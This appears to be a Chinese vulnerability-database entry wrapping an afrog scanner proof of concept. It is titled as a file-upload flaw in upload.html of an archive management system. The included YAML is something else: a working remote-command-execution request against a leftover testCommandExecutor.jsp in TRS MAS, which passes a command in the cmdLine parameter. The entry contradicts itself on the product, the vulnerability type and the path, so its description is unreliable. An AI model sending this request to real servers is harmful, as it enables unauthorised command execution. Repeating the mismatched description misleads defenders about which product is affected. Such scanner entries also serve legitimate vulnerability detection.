漏洞信息
漏洞名称: 紫光档案管理系统 upload.html 后台文件上传漏洞
漏洞类型: 文件上传
漏洞等级: 高危
漏洞描述: 紫光档案管理系统是由拓尔思开发的一款媒资管理系统,广泛应用于企业和机构中,用于管理和存储媒体资源。该系统提供了一个web界面,方便用户进行媒资的上传、管理和检索。然而,系统中存在一个严重的文件上传漏洞,具体位于upload.html后台页面。攻击者可以利用这个漏洞上传恶意文件,进而可能获取服务器权限。漏洞的根源在于系统未能对上传的文件进行充分的验证和过滤,导致攻击者可以上传包含恶意代码的文件。由于该漏洞位于后台管理界面,攻击者可能需要一定的权限才能利用此漏洞,但一旦利用成功,将导致服务器被完全控制,数据泄露和服务中断等严重后果。
产品厂商: 拓尔思
产品名称: MAS媒资管理系统
来源: https://github.com/zan8in/afrog/blob/b9686a5c4553da942d9b8736d91cd87b6ee026b1/pocs%2Fafrog-pocs%2Fvulnerability%2Fmax-test-command-executor-rce.yaml
类型: zan8in/afrog:github commit
POC详情
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21
| id: max-test-command-executor-rce
info: name: 紫光档案管理系统 upload.html 后台文件上传漏洞 author: zan8in severity: high verified: true description: | 拓尔思 MAS testCommandExecutor.jsp测试文件存在远程命令执行漏洞,当网站运维者未删除测试文件时,攻击者通过漏洞可以获取服务器权限 "MAS媒资管理系统登录页面" rules: r0: request: method: GET path: /mas/front/vod/main.do?method=newList&view=forward:/sysinfo/testCommandExecutor.jsp&cmdLine=dir&workDir=&pathEnv=&libPathEnv= expression: response.status == 200 && response.body.ibcontains(b'D:\\TRS\\TRSMAS\\') expression: r0()
|